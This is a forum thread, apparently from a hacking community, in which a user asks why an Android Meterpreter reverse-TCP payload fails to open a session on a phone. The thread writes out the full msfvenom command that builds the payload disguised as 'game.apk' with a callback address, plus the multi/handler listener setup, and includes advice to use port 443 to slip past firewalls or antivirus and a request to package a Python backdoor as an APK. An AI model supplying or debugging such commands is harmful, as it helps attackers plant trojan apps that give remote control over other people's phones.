android/meterpreter/reverse_tcp

i have been creating a file using the above payload using msfvenom but it in unable to get the meterpreter session on the mobile in the lan network.
using the msfconsole with the above payload and multi/handler to listen the request it doesnt create a meterpreter session.

What commands did you use? What have you tried? What type of phone do you have? This is information that you should have prepared before posting a question, man.

@z3r0shred my apologies… was really looking for some help as couldnt find help from anywhere dont know anyone that could help. i really appreciate your help.
coming back to problem i am using note 7 pro
firstly used msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=1234 -e -f apk > game.apk
got an apk file i transfered it to the system and installed it

fired up my msfconsole
set payload android/meterpreter/reverse_tcp
use multi/handler

set LHOST 192.168.2.2
set LPORT 1234

run

still it kept listening even i tried to open the installed app inside the phone no error was generated from the multi handler and even no meterpreter session was created.

thanks again for your time and support.

first thought, change port, try 443

@peek thanks for advice but tried it after you suggested but the handler started but was not able to get meterpreter shell . i thought that after setting the port to 443 it could bypass firewall or antivirus if any but still it kept listening after opening the app that was installed on the phone. looking forward for your advice thanks again.

i dont know much about android> @00H4ck3r00 said:

@peek thanks for advice but tried it after you suggested but the handler started but was not able to get meterpreter shell . i thought that after setting the port to 443 it could bypass firewall or antivirus if any but still it kept listening after opening the app that was installed on the phone. looking forward for your advice thanks again.

check that

I have write a backdoor in a python…
File *.py
I want to convert that into apk how i can do that??

@GHOSTontheWire said:

I have write a backdoor in a python…
File *.py
I want to convert that into apk how i can do that??

I would assume you could use Python for Android: Getting Started — python-for-android 0.1 documentation